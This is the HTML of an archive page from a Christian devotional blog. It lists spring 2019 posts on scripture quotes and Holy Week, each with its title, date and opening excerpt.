class="clear-fix"><article id="post-16729" class="post-16729 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-heart tag-motive tag-pure tag-purity tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/04/is-purity-of-motive-essential-for-acceptable-worship-of-god/" rel="bookmark">Is purity of motive essential for acceptable worship of&nbsp;God?</a></h1> </header> <span>May 4, 2019</span> <p>I must have a pure heart. Jesus is clear on that. I can’t see God without a pure heart. Is &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/04/is-purity-of-motive-essential-for-acceptable-worship-of-god/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16729 --> <article id="post-15106" class="post-15106 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-jesus tag-jesus-sayings tag-luke-19 tag-restore tag-salvation tag-sin tag-sinner"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/04/today-is-salvation-day-in-this-home-jesus/" rel="bookmark">“Today is salvation day in this home!&#8221;&nbsp;~Jesus</a></h1> </header> <span>May 4, 2019</span> <p>Jesus says that today is salvation day. Imagine hearing those words from the Master Jesus. You would have to pick &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/04/today-is-salvation-day-in-this-home-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15106 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16725" class="post-16725 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-amazement tag-beauty tag-glory tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/03/should-we-be-amazed-at-gods-actions-and-his-marvelous-deeds/" rel="bookmark">Should we be amazed at God’s actions and His marvelous&nbsp;deeds?</a></h1> </header> <span>May 3, 2019</span> <p>I am constantly amazed and stunned at how good God is and beautiful His works are. He has done wonderful &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/03/should-we-be-amazed-at-gods-actions-and-his-marvelous-deeds/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16725 --> <article id="post-15099" class="post-15099 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-joy tag-king-david tag-passion tag-psalm-19 tag-rejoice tag-wise-sayings tag-word-of-god"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/03/the-precepts-of-the-lord-are-right-rejoicing-the-heart-king-david/" rel="bookmark">&#8220;The precepts of the Lord are right, rejoicing the heart.&#8221; ~King&nbsp;David</a></h1> </header> <span>May 3, 2019</span> <p>Joy is something we all long for but that often seems difficult to grab hold of. Experiencing joy should be &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/03/the-precepts-of-the-lord-are-right-rejoicing-the-heart-king-david/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15099 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16717" class="post-16717 post type-post status-publish format-standard hentry category-god-thoughts category-personal-thoughts tag-baptism tag-resurrection tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/02/is-resurrection-being-completely-united-to-jesus-the-messiah-in-his-resurrection/" rel="bookmark">Will our resurrection have us completely united to Jesus the Messiah in His&nbsp;resurrection?</a></h1> </header> <span>May 2, 2019</span> <p>I have been baptized. That unites me with the death, burial and resurrection of my Master Jesus. I live a &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/02/is-resurrection-being-completely-united-to-jesus-the-messiah-in-his-resurrection/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16717 --> <article id="post-15087" class="post-15087 post type-post status-publish format-standard hentry category-god-thoughts tag-apostle-paul-sayings tag-death tag-humble tag-philippians-2"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/02/jesus-humbled-himself-by-becoming-obedient-to-the-point-of-death-even-death-on-a-cross-apostle-paul/" rel="bookmark">&#8220;Jesus humbled Himself by becoming obedient to the point of death, even death on a cross.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>May 2, 2019</span> <p>Jesus was not wrestling with God’s will or resisting God’s will. Jesus is obedient. He was yielding Himself to God’s &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/02/jesus-humbled-himself-by-becoming-obedient-to-the-point-of-death-even-death-on-a-cross-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15087 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16713" class="post-16713 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-friend tag-jesus tag-sin tag-sinner tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/01/in-his-life-on-earth-was-jesus-a-friend-to-those-who-miss-gods-goal-for-their-life/" rel="bookmark">In His life on earth, was Jesus a friend to those who miss God’s goal for their&nbsp;life?</a></h1> </header> <span>May 1, 2019</span> <p>I miss God’s goal for my life (aka sin or sinning). That is my natural state. Does this bother Jesus? &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/01/in-his-life-on-earth-was-jesus-a-friend-to-those-who-miss-gods-goal-for-their-life/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16713 --> <article id="post-15083" class="post-15083 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-evidence tag-faith tag-hebrews-11 tag-substance tag-witness"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/01/by-faith-we-see-the-world-called-into-existence-by-gods-word-what-we-see-created-by-what-we-dont-see-author-of-hebrews/" rel="bookmark">&#8220;By faith, we see the world called into existence by God’s word, what we see created by what we don’t see.&#8221; ~Author of&nbsp;Hebrews</a></h1> </header> <span>May 1, 2019</span> <p>God is God. God created the universe and everything we know of. God did it through His word. God just &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/01/by-faith-we-see-the-world-called-into-existence-by-gods-word-what-we-see-created-by-what-we-dont-see-author-of-hebrews/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15083 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16709" class="post-16709 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-family tag-opposition tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/30/is-jesus-opposed-by-family-and-friends/" rel="bookmark">Is Jesus opposed by family and&nbsp;friends?</a></h1> </header> <span>April 30, 2019</span> <p>Jesus encounters lots of opposition. There are a lot of Jesus-deniers out there. Am I one of them? Jesus the &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/30/is-jesus-opposed-by-family-and-friends/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16709 --> <article id="post-15078" class="post-15078 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-ask tag-common-sense tag-honesty tag-james-1 tag-king-solomon tag-knowledge tag-proverbs-2 tag-understanding tag-wisdom tag-wise-sayings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/30/god-gives-out-wisdom-free-is-plain-spoken-in-knowledge-and-understanding-king-solomon/" rel="bookmark">&#8220;God gives out wisdom free, is plain spoken in knowledge and understanding.&#8221; ~King&nbsp;Solomon</a></h1> </header> <span>April 30, 2019</span> <p>God is ready, willing and able to give me wisdom. God makes it clear and is plain spoken. There is &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/30/god-gives-out-wisdom-free-is-plain-spoken-in-knowledge-and-understanding-king-solomon/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15078 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16702" class="post-16702 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-authority tag-government tag-master tag-rulers tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/29/are-rulers-gods-servants-to-do-good-and-restrain-evil/" rel="bookmark">Are rulers God’s servants to do good and restrain&nbsp;evil?</a></h1> </header> <span>April 29, 2019</span> <p>God is clear. I must recognize that authority comes from God. This is a foundational principle. I am challenged by &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/29/are-rulers-gods-servants-to-do-good-and-restrain-evil/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16702 --> <article id="post-15074" class="post-15074 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-apostle-paul-sayings tag-propitiation tag-romans-3 tag-sin"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/29/whom-god-displayed-publicly-as-a-propitiation-in-his-blood-through-faith-apostle-paul/" rel="bookmark">&#8220;Whom God displayed publicly as a propitiation in His blood through faith.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>April 29, 2019</span> <p>Jesus paid the price for my having missed God’s goal (aka sin) for my life. A penalty had to be &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/29/whom-god-displayed-publicly-as-a-propitiation-in-his-blood-through-faith-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15074 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16693" class="post-16693 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-law tag-legalism tag-moses tag-righteousness tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/28/is-legalism-is-contrary-to-the-good-news-of-jesus/" rel="bookmark">Is legalism contrary to the good news of&nbsp;Jesus?</a></h1> </header> <span>April 28, 2019</span> <p>I fall into the trap of thinking that if I just follow the rules, I will be seen as good &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/28/is-legalism-is-contrary-to-the-good-news-of-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16693 --> <article id="post-15069" class="post-15069 post type-post status-publish format-standard hentry category-god-thoughts category-gods-goal tag-adultery tag-divorce tag-jesus tag-jesus-manifesto tag-jesus-sayings tag-marriage tag-matthew-5"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/28/i-say-to-you-that-everyone-who-divorces-his-wife-except-on-the-ground-of-sexual-immorality-makes-her-commit-adultery-and-whoever-marries-a-divorced-woman-commits-adultery-jesus/" rel="bookmark">&#8220;I say to you that everyone who divorces his wife, except on the ground of sexual immorality, makes her commit adultery, and whoever marries a divorced woman commits adultery.&#8221; ~Jesus</a></h1> </header> <span>April 28, 2019</span> <p>Full disclosure. I have been divorced and have remarried. Jesus has some very clear instructions on marriage and divorce. This &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/28/i-say-to-you-that-everyone-who-divorces-his-wife-except-on-the-ground-of-sexual-immorality-makes-her-commit-adultery-and-whoever-marries-a-divorced-woman-commits-adultery-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15069 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16682" class="post-16682 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-disciple tag-good-news tag-kingdom-of-god tag-teacher tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/27/was-jesus-the-messiahs-mission-one-of-preaching-and-teaching/" rel="bookmark">Was Jesus the Messiah’s mission one of preaching and&nbsp;teaching?</a></h1> </header> <span>April 27, 2019</span> <p>I am a disciple of Jesus. That means I must learn from Jesus. Jesus was one a mission to preach &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/27/was-jesus-the-messiahs-mission-one-of-preaching-and-teaching/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16682 --> <article id="post-15064" class="post-15064 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-apostle-james-sayings tag-james-2 tag-judgement tag-love tag-mercy"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/27/for-judgment-will-be-merciless-to-one-who-has-shown-no-mercy-mercy-triumphs-over-judgment-james/" rel="bookmark">&#8220;For judgment will be merciless to one who has shown no mercy; mercy triumphs over judgment.&#8221; ~James</a></h1> </header> <span>April 27, 2019</span> <p>Can I pass the test? Let’s call it the mercy test. Jesus orders me to be merciful. Am I? Jesus &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/27/for-judgment-will-be-merciless-to-one-who-has-shown-no-mercy-mercy-triumphs-over-judgment-james/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15064 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16678" class="post-16678 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-forgive tag-love tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/26/is-the-call-to-exercise-forgiveness-a-principle-of-life/" rel="bookmark">Is the call to exercise forgiveness a principle of&nbsp;life?</a></h1> </header> <span>April 26, 2019</span> <p>My mission, given to me by God, is to love. In order to love, I need to learn how to &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/26/is-the-call-to-exercise-forgiveness-a-principle-of-life/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16678 --> <article id="post-15058" class="post-15058 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-jesus tag-jesus-sayings tag-mark-8 tag-miracles tag-proof"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/26/why-does-this-generation-clamor-for-miraculous-guarantees-jesus/" rel="bookmark">“Why does this generation clamor for miraculous guarantees?&#8221; ~Jesus</a></h1> </header> <span>April 26, 2019</span> <p>Prove it! The religious elites want &#8220;proof&#8221;. The atheists clamor for &#8220;proof&#8221;. Some days, so do I. It is an &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/26/why-does-this-generation-clamor-for-miraculous-guarantees-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15058 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16668" class="post-16668 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-teachings tag-temptation"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/25/can-we-find-in-god-and-his-word-resources-to-overcome-temptation/" rel="bookmark">Can we find in God and his word resources to overcome&nbsp;temptation?</a></h1> </header> <span>April 25, 2019</span> <p>God is good. God is good all the time. I struggle with temptation. I know all followers of our Master &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/25/can-we-find-in-god-and-his-word-resources-to-overcome-temptation/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16668 --> <article id="post-15055" class="post-15055 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-apostle-paul-sayings tag-broken-heart tag-heart tag-law tag-romans-7 tag-sin"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/25/for-i-joyfully-concur-with-the-law-of-god-in-the-inner-man-apostle-paul/" rel="bookmark">&#8220;For I joyfully concur with the law of God in the inner man.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>April 25, 2019</span> <p>The believer has an old nature that wants to keep him in bondage; “I will get free from these old &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/25/for-i-joyfully-concur-with-the-law-of-god-in-the-inner-man-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15055 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16615" class="post-16615 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-holy-spirit tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/24/is-the-gift-of-the-spirit-for-all-believers/" rel="bookmark">Is the gift of the Spirit for all&nbsp;believers?</a></h1> </header> <span>April 24, 2019</span> <p>I have the power of the Holy Spirit in my life. It is a gift from Jesus. There is nothing &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/24/is-the-gift-of-the-spirit-for-all-believers/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16615 --> <article id="post-15050" class="post-15050 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-jesus tag-jesus-sayings tag-john-4 tag-pharisees tag-religious-elites tag-samaria"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/24/give-me-a-drink-jesus/" rel="bookmark">“Give me a drink.”&nbsp;~Jesus</a></h1> </header> <span>April 24, 2019</span> <p>Jesus is tired and thirsty. That is it. That is how the conversation started. Of course, our Master’s request was &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/24/give-me-a-drink-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15050 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16599" class="post-16599 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-faith tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/23/is-faith-strengthened-through-testing/" rel="bookmark">Is faith strengthened through&nbsp;testing?</a></h1> </header> <span>April 23, 2019</span> <p>There is much to be said about faith. So … we start with God. God is the object of my &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/23/is-faith-strengthened-through-testing/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16599 --> <article id="post-15043" class="post-15043 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-1-corinthians-10 tag-apostle-paul-sayings tag-faithfulness"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/23/god-is-faithful-who-will-not-allow-you-to-be-tempted-beyond-what-you-are-able-but-with-the-temptation-will-provide-the-way-of-escape-also-so-that-you-will-be-able-to-endure-it-apostle-paul/" rel="bookmark">&#8220;God is faithful, who will not allow you to be tempted beyond what you are able, but with the temptation will provide the way of escape also, so that you will be able to endure it.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>April 23, 2019</span> <p>Now here is some good news. God is faithful. I can count on God and Jesus, His Son. God is &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/23/god-is-faithful-who-will-not-allow-you-to-be-tempted-beyond-what-you-are-able-but-with-the-temptation-will-provide-the-way-of-escape-also-so-that-you-will-be-able-to-endure-it-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15043 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16629" class="post-16629 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-god-is-god tag-holy-spirit tag-justice tag-sin tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/22/does-justice-come-through-the-holy-spirit-of-god/" rel="bookmark">Does justice come through the Holy Spirit of&nbsp;God?</a></h1> </header> <span>April 22, 2019</span> <p>The Holy Spirit convicts me. I miss God’s goal for my life (aka sin) and the Holy Spirit of God &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/22/does-justice-come-through-the-holy-spirit-of-god/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16629 --> <article id="post-15037" class="post-15037 post type-post status-publish format-standard hentry category-god-thoughts tag-authority tag-jesus tag-matthew-8 tag-slave"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/22/and-to-my-slave-do-this-and-he-does-it-roman-centurion-to-jesus/" rel="bookmark">&#8220;And to my slave, &#8216;Do this!&#8217; and he does it.&#8221; ~Roman Centurion to&nbsp;Jesus</a></h1> </header> <span>April 22, 2019</span> <p>The Centurion understood authority. He had slaves. Slaves do what they are told. Do I get this? Do I do &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/22/and-to-my-slave-do-this-and-he-does-it-roman-centurion-to-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15037 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16662" class="post-16662 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-holy-week tag-jesus tag-resurrection tag-resurrection-sunday tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/21/it-is-resurrection-sunday-he-is-risen/" rel="bookmark">It is &#8220;Resurrection Sunday&#8221;! He is&nbsp;risen!</a></h1> </header> <span>April 21, 2019</span> <p>Here we are. It is &#8220;Resurrection Sunday&#8221;. I&#8217;m celebrating the resurrection of Jesus not bunnies and chocolate candy. That&#8217;s just &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/21/it-is-resurrection-sunday-he-is-risen/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16662 --> <article id="post-15035" class="post-15035 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-beginning tag-genesis-1 tag-god tag-jesus tag-moses tag-moses-sayings tag-word-of-god"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/21/in-the-beginning-god-created-the-heavens-and-the-earth-moses/" rel="bookmark">&#8220;In the beginning God created the heavens and the earth.&#8221;&nbsp;~Moses</a></h1> </header> <span>April 21, 2019</span> <p>There is a beginning. God, always and forever God, created everything. The good news is we have Jesus, the very &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/21/in-the-beginning-god-created-the-heavens-and-the-earth-moses/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15035 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16657" class="post-16657 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-crucifixion tag-holy-saturday tag-holy-week tag-resurrection tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/20/the-lull-of-holy-saturday-what-was-jesus-up-to/" rel="bookmark">The lull of Holy Saturday &#8212; What was Jesus up&nbsp;to?</a></h1> </header> <span>April 20, 2019</span> <p>There is a break from the horror of Good Friday! Jesus is carrying out the plan of His Father. His &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/20/the-lull-of-holy-saturday-what-was-jesus-up-to/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16657 --> <article id="post-15033" class="post-15033 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-authority tag-king-david tag-king-jesus tag-psalm-45 tag-wise-sayings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/20/your-throne-is-gods-throne-ever-and-always-the-scepter-of-your-royal-rule-measures-right-living-king-david/" rel="bookmark">&#8220;Your throne is God’s throne, ever and always; the scepter of your royal rule measures right living.&#8221; ~King&nbsp;David</a></h1> </header> <span>April 20, 2019</span> <p>Jesus is King of God&#8217;s country. Jesus will rule forever and ever. There is no end to His authority. Jesus &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/20/your-throne-is-gods-throne-ever-and-always-the-scepter-of-your-royal-rule-measures-right-living-king-david/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15033 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16650" class="post-16650 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-good-friday tag-holy-friday tag-holy-week tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/19/good-news-it-is-holy-friday-it-is-a-stunning-day-to-remember-what-jesus-accomplished-for-us/" rel="bookmark">Good news! It is Holy Friday. It is a stunning day to remember what Jesus accomplished for&nbsp;us.</a></h1> </header> <span>April 19, 2019</span> <p>Good Friday, also known as &#8220;Holy Friday,&#8221; is the Friday immediately preceding Resurrection Sunday. It is celebrated traditionally as the day &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/19/good-news-it-is-holy-friday-it-is-a-stunning-day-to-remember-what-jesus-accomplished-for-us/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16650 --> <article id="post-15030" class="post-15030 post type-post status-publish format-standard hentry category-personal-thoughts tag-agnostics tag-atheism tag-atheist tag-god-denier tag-god-hater tag-jesus tag-master-jesus tag-sin"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/19/god-deniers-and-god-haters-show-that-gods-law-is-not-something-alien-imposed-on-us-from-without-but-woven-into-the-very-fabric-of-our-creation/" rel="bookmark">God-deniers and God-haters show that God’s law is not something alien, imposed on us from without, but woven into the very fabric of our&nbsp;creation.</a></h1> </header> <span>April 19, 2019</span> <p>There are many people today who know about the moral code (law of God) established by God in the Old &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/19/god-deniers-and-god-haters-show-that-gods-law-is-not-something-alien-imposed-on-us-from-without-but-woven-into-the-very-fabric-of-our-creation/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15030 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16647" class="post-16647 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-holy-thursday tag-holy-week tag-jesus tag-maundy-thursday tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/18/it-is-a-great-day-of-remembrance-for-holy-thursday/" rel="bookmark">It is a great day of remembrance for Holy&nbsp;Thursday.</a></h1> </header> <span>April 18, 2019</span> <p>It is Holy Thursday. Spending time today reflecting on that day and evening before the Crucifixion of our Master Jesus, &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/18/it-is-a-great-day-of-remembrance-for-holy-thursday/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16647 --> <article id="post-15028" class="post-15028 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-jesus tag-jesus-sayings tag-john-17 tag-joy"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/18/but-now-i-come-to-you-and-these-things-i-speak-in-the-world-so-that-they-may-have-my-joy-made-full-in-themselves-jesus/" rel="bookmark">“But now I come to You; and these things I speak in the world so that they may have My joy made full in themselves.”&nbsp;~Jesus</a></h1> </header> <span>April 18, 2019</span> <p>We have a great promise from Jesus the Messiah. It is joy and happiness. Jesus wants me to have joy. &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/18/but-now-i-come-to-you-and-these-things-i-speak-in-the-world-so-that-they-may-have-my-joy-made-full-in-themselves-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15028 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16645" class="post-16645 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-holy-wednesday tag-holy-week tag-spy-wednesday tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/17/what-is-spy-wednesday/" rel="bookmark">What is &#8220;Spy Wednesday&#8221;?</a></h1> </header> <span>April 17, 2019</span> <p>According to the traditional interpretation of the Bible, Holy Wednesday is the day on which Jesus was anointed with spikenard during a &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/17/what-is-spy-wednesday/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16645 --> <article id="post-15024" class="post-15024 post type-post status-publish format-standard hentry category-god-thoughts category-gods-goal tag-apostle-paul-sayings tag-foolish tag-fools tag-romans-1 tag-wisdom"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/17/claiming-to-be-wise-they-became-fools-and-exchanged-the-glory-of-the-immortal-god-for-images-resembling-mortal-man-birds-four-footed-animals-and-reptiles-apostle-paul/" rel="bookmark">&#8220;Claiming to be wise, they became fools and exchanged the glory of the immortal God for images . . .&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>April 17, 2019</span> <p>I want wisdom. It is important to my daily walk with Jesus. I am called to be a learner (aka &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/17/claiming-to-be-wise-they-became-fools-and-exchanged-the-glory-of-the-immortal-god-for-images-resembling-mortal-man-birds-four-footed-animals-and-reptiles-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15024 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16643" class="post-16643 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-authority tag-holy-tuesday tag-holy-week tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/16/holy-tuesday-is-a-busy-day/" rel="bookmark">Holy Tuesday is a busy&nbsp;day</a></h1> </header> <span>April 16, 2019</span> <p>Holy Tuesday is a busy day. Many chapters of the Gospels are devoted to it.(Matthew 21:23—23:39; Mark 11:27—12:44; Luke 20:1—21:4). Here is &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/16/holy-tuesday-is-a-busy-day/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16643 --> <article id="post-15022" class="post-15022 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-children tag-jesus tag-jesus-sayings tag-kingdom-of-god tag-luke-18 tag-religious-elites"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/16/mark-this-unless-you-accept-gods-kingdom-in-the-simplicity-of-a-child-youll-never-get-in-jesus/" rel="bookmark">&#8220;Mark this: Unless you accept God’s kingdom in the simplicity of a child, you’ll never get in.”&nbsp;~Jesus</a></h1> </header> <span>April 16, 2019</span> <p>Jesus has something He wants me to know. Jesus wants me to approach His kingdom with simplicity. Jesus wants me &hellip;</p> <p><a 